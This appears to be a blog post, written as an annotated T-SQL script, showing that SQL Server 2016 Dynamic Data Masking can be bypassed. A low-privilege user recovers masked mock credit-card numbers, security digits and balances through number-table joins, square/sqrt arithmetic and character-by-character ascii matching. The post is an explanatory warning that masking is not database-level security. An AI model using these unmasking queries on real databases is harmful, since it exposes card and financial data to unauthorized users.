Unmasking the Dynamic Data Masking

/*

Revised 27th June

 

Dynamic data masking is a great product and solves some niche problems that come if you need to do certain testing with live data at the application level. You should, however, beware of using it as a database-level security device.

I haven’t yet used it in testing because I don’t have the problem that it solves.

The problem that it solves is for people doing testing, especially user-acceptance testing, of an application using live data. It is good at masking data where the user is unable to make direct access to the database to execute queries.

If you want to do user-acceptance testing, you simply use a database role for whom the data is masked. Nothing else in the data or application needs to be changed, though you need to be careful about some functions such as editing of (potentially masked) data.

Dynamic data masking isn’t an effective database-level security device. A determined person can still get at the data. The algorithm is greatly improved over the earlier pre-release versions of SQL Server 2016, but it isn’t yet perfect. It can still be hacked. Let me demonstrate */

 

USE PhilFactor    /*we’ll use our sample SQL Server 2016 database

 

The first thing we do is to create a number table if it doesn’t exist.

*/

 

/* Drop table numbers (only execute this if you’re making changes) */

 

IF NOT EXISTS (SELECT 1 FROM information_schema.tables WHERE Table_Name=‘numbers’)

       CREATE TABLE numbers (number INT PRIMARY KEY);

IF NOT EXISTS (SELECT 1 FROM numbers WHERE number=10)

  BEGIN    

  DECLARE @digits TABLE (n CHAR)

  INSERT INTO @Digits(n)

    SELECT X.i

    FROM (SELECT (‘1’)UNION SELECT (‘2’)UNION SELECT (‘3’)UNION SELECT (‘4’)

             UNION SELECT (‘5’) UNION SELECT (‘6’)UNION SELECT (‘7’)

                UNION SELECT (‘8’)UNION SELECT (‘9’)UNION SELECT(‘0’))

      AS X(i);

  INSERT INTO Numbers

       SELECT convert(INT, D1.n + D2.n + D3.n + D4.n + D5.n + D6.n) AS number

    FROM @Digits AS D1, @Digits AS D2, @Digits AS D3, @Digits AS D4, @Digits AS D5, @Digits AS D6

       ORDER BY number;

  DELETE FROM numbers WHERE number=0; 

  END

 

/*

Now we will set up a mock table with some credit card numbers in it and some security digits. We will set up dynamic data masking

*/

 

 revert

IF (object_id(‘dbo.MyCreditCards’) IS NOT NULL)

       DROP TABLE dbo.MyCreditCards

GO

CREATE TABLE dbo.MyCreditCards (

  creditCard_ID INT IDENTITY,

  Provider VARCHAR(30),

  Number VARCHAR(100) MASKED WITH (FUNCTION = ‘partial(1,”XXXXXXX”,0)’) NULL,

  digits int MASKED WITH (FUNCTION = ‘default()’) NULL,

  Balance money MASKED WITH (FUNCTION = ‘default()’) NULL,

  Credit_index float MASKED WITH (FUNCTION = ‘default()’) NULL,

  Known_Default_Average Decimal(8,2) MASKED WITH (FUNCTION = ‘default()’) NULL

  )

 

/* now we will set up the table with some mock data */

 

INSERT INTO MyCreditCards (Provider,Number,digits, balance, Credit_index,Known_Default_Average)

 SELECT provider, number, digits, balance, Credit_index,Known_Default_Average FROM (VALUES

   (‘Airplus’,‘122000000000003’, 563, 345.23,2.444, 23.23),

   (‘American Express’,‘34343434343434’, 143, 56.44, 1.45367,87.34),

   (‘American Express’,‘378282246310005’, 541, 234.98, 1.455,45.32),

   (‘American Express’,‘371449635398431’, 243, 249.00, 1.397, 19.45),

   (‘American Express Corporate’,‘378734493671000’,576, 45.78, 4.00, 83.20),

   (‘Australian BankCard’,‘5610591081018250’,837, 341.727, 86.5510803384479, 1.16),

   (‘Dankort (PBS)’,‘5019717010103742’,717, 979.6372, 28.0325248353335, 1.70),

   (‘Diners Club’,‘30569309025904’,813, 492.1039, 19.9180960566355, 2.67),

   (‘Diners Club’,‘38520000023237’,595, 764.2249, 97.7891119833985, 0.57),

   (‘Diners Club’,‘36700102000000’,764, 190.1438, 64.5213314404345, 0.28),

   (‘Diners Club’,‘36148900647913’,557, 382.0786, 26.3416622622598, 0.39),

   (‘Discover card’,‘6011000400000000’,802, 229.0121, 68.0298162759421, 0.37),

   (‘Discover card’,‘6011111111111117’,433, 871.6858, 37.9636457995342, 2.63),

   (‘Discover card’,‘6011000990139424’,338, 389.1325, 51.7720675555859, 1.91),

   (‘JCB’,‘3530111333300000’,275, 563.3207, 93.2751041740529, 0.90),

   (‘JCB’,‘3566002020360505’,872, 595.6164, 33.9023412614606, 0.20),

   (‘JCB’,‘3528000700000000’,712, 460.8667, 24.9165346314742, 0.06),

   (‘Laser’,‘630495060000000000’,139, 730.9588, 42.4225722171471, 0.31),

   (‘Laser’,‘630490017740292441’,701, 188.6773, 71.1843278921136, 0.68),

   (‘Maestro’,‘6759649826438453’,196, 807.5152, 51.2412214103347, 0.62),

   (‘Maestro’,‘6799990100000000019’,573, 150.622, 77.7391501500919, 1.20),

   (‘Mastercard’,‘5555555555554444’,949, 363.7482, 78.6266174333294, 0.61),

   (‘Mastercard’,‘5454545454545454’,357, 906.3862, 53.1121607996114, 0.44),

   (‘MasterCard’,‘5105105105105100’,207, 146.4457, 18.1780982223237, 0.60),

   (‘Switch/Solo (Paymentech)’,‘6331101999990016’,952, 334.8059, 72.4790652373242, 0.32),

   (‘Visa’,‘4111111111111111’,989, 120.9948, 26.132675796809,1.16),

   (‘Visa’,‘4012888888881881’,555, 751.5164, 99.6884540550823, 0.72),

   (‘Visa’,‘4222222222222’,364, 462.6201, 63.5308831811561, 2.40),

   (‘Visa’,‘4444333322221111’,615, 922.3543, 27.8983184452626, 1.86),

   (‘Visa’,‘4911830000000’,681, 744.0226, 84.3608046245579, 2.82),

   (‘Visa’,‘4917610000000000’,557, 151.2514, 79.6490148839769, 1.31),

   (‘Visa Debit’,‘4462030000000000’,734, 564.2765, 42.9801020044741, 0.85),

   (‘Visa Debit’,‘4917610000000000003’,790, 387.2116, 1.67513696647954, 1.88),

   (‘Visa Electron (UK only)’,‘4917300800000000’,390, 599.0702, 87.6530341495075, 0.45),

   (‘Visa Purchasing’,‘4484070000000000’,499, 249.4198, 6.42316139788514, 2.58)

 )CreditCards(Provider,Number,digits, balance, credit_index,Known_Default_Average)

 

 Select * from MyCreditCards

 

GO

 use philFactor

/* we can, of course select all the columns because we have permission to do so as dbo (or whatever) */

Unmasked.bmp

/* now we set up the TestUser who shouldn’t receive any sensitive data */

CREATE USER TestUser WITHOUT LOGIN;

GRANT SELECT ON dbo.MyCreditCards TO TestUser;

GRANT SELECT ON dbo.numbers TO TestUser;

/* now we can execute a query as the test user and confirm that we can’t see the sensitive data */

EXECUTE AS USER = ‘TestUser’;

SELECT * FROM MyCreditCards

 

Masked.bmp

/* REVERT; – we can use this to revert to our normal DBO role */

SELECT CURRENT_USER /* to make sure we are the correct Test User role */

 

/* However, those digits are as easy to get as taking candy from a baby. For a start, one can get the integers just by joining to a number table */

 

SELECT CreditCard_ID, numbers.number FROM

numbers INNER JOIN MyCreditCards

ON numbers.number=MyCreditCards.digits

 

/* and money values and approximate numbers can be easily be retrieved too within a single query, but only as floats.

Probably accurate enough for the villains */

 

Select

  square(sqrt(convert(Decimal(18,8),digits))),

  square(sqrt(Balance)),

  square(sqrt(convert(Decimal(18,8),credit_index))),

  square(sqrt(Known_Default_Average))

    from MyCreditCards

/* you can do better if you can put up with a temporary table or table variable */

 

Create table #temp  (

  digits float,

  Balance float,

  Credit_index float,

  Known_Default_Average float

  )

 

insert into #temp

  Select

    square(sqrt(convert(Decimal(18,8),digits))),

    square(sqrt(Balance)),

    square(sqrt(convert(Decimal(18,8),credit_index))),

    square(sqrt(Known_Default_Average))

  from MyCreditCards

 

Select convert(int, digits), convert(money,Balance),

       credit_index, Convert(Decimal(8,2),Known_Default_Average)

  from #temp

 

 

/*

 

What about the strings? Well, the masking algorithm is quite good at struggling but eventually, you can trick it before breaking into a sweat. Firstly, we will try to mislead it into revealing the string containing the credit card number.*/

 

SELECT MyCreditCards.number,

(SELECT char(TheASCIIValue.number)

 FROM numbers i

   INNER JOIN numbers TheASCIIValue

    ON substring(MyCreditCards.number,i.number,1)=char(TheASCIIValue.number) COLLATE Latin1_General_CS_AS

 WHERE TheASCIIValue.number <255 AND i.number<=len(MyCreditCards.number)

 ORDER BY i.number

 FOR XML PATH(), TYPE).value(‘.’, ‘varchar(max)’) TRANSLATION

FROM  MyCreditCards

 

/* neat, but it doesn’t work. The algorithm can detect that you are working on MyCreditCards which is supposed to be masked. It manages to put a mask on the result */

 

FirstFailure.bmp

/* We need to try harder. Basically, this works*/

 

SELECT CreditCard_ID, char(numbers.number) FROM

numbers INNER JOIN MyCreditCards

ON numbers.number=ascii(substring(MyCreditCards.number,1,1))

 

/* you can see the first digit in the credit card number! From then on in, it is routine. Don’t worry that this looks clunky. It is here just to demonstrate that you can see the string */

 

DECLARE @TheCreditCardCharacters TABLE(Creditcard_ID INT,TheIndex INT,TheCharacter CHAR(1))

INSERT INTO @TheCreditCardCharacters (Creditcard_ID,TheIndex,TheCharacter)

  SELECT creditcard_id, TheLength.number, char(numbers.number)

FROM MyCreditCards

CROSS JOIN numbers Thelength

INNER JOIN numbers

ON numbers.number=ascii(substring (MyCreditCards.number,TheLength.number,1));

 

SELECT creditcard_ID,

(SELECT TheCharacter

 FROM @TheCreditCardCharacters EachCharacter

 WHERE AllCreditCards.creditcard_id=EachCharacter.CreditCard_ID

 ORDER BY EachCharacter.TheIndex

 FOR XML PATH(), TYPE).value(‘.’, ‘varchar(max)’) TRANSLATION

FROM @TheCreditCardCharacters AllCreditCards

GROUP BY creditcard_id;

go

 

Translated.bmp

/* Pretty soon, I guess, they’ll plug this leak. The algorithm is cunning but because I disguised the relationship with the

table a little bit, it was fooled. Drop your guard a bit and it will put the mask back in. If you were to tidy things up a bit with a CTE (don’t because it performs badly), the mask would be reimposed */

;WITH TheCreditCardDetails AS

       (

  SELECT creditcard_id, TheLength.number AS TheIndex, char(numbers.number) AS TheCharacter

FROM MyCreditCards

CROSS JOIN numbers Thelength

INNER JOIN numbers

ON numbers.number=ascii(substring (MyCreditCards.number,TheLength.number,1)))

 

SELECT creditcard_ID,

(SELECT TheCharacter

 FROM TheCreditCardDetails EachCharacter

 WHERE AllCreditCards.creditcard_id=EachCharacter.CreditCard_ID

 ORDER BY EachCharacter.TheIndex

 FOR XML PATH(), TYPE).value(‘.’, ‘varchar(max)’) TRANSLATION

FROM TheCreditCardDetails AllCreditCards

GROUP BY creditcard_id

ORDER BY creditcard_id;

 

SecondFailure.bmp

/* Yep, the mask is back even though the CTE returns the info. */

/* Beware that I’m not giving high-performance solutions, just showing you that Dynamic Data Masking is great for application user-acceptance testing, and a useful addition to SQL Server for a niche purpose, but you must not assume that it provides any security at the database level.  If you’re using DDM, and have SQL Compare, see Steve Jones’ article on Using SQL Compare with Dynamic Data Masking.” */

/* Many thanks to Aaron Bertrand for getting me interested in this topic in the course of his entertaining presentation at SQLBits, and especial thanks to Gianluca Sartori (â@spaghettidba) for his help

.*/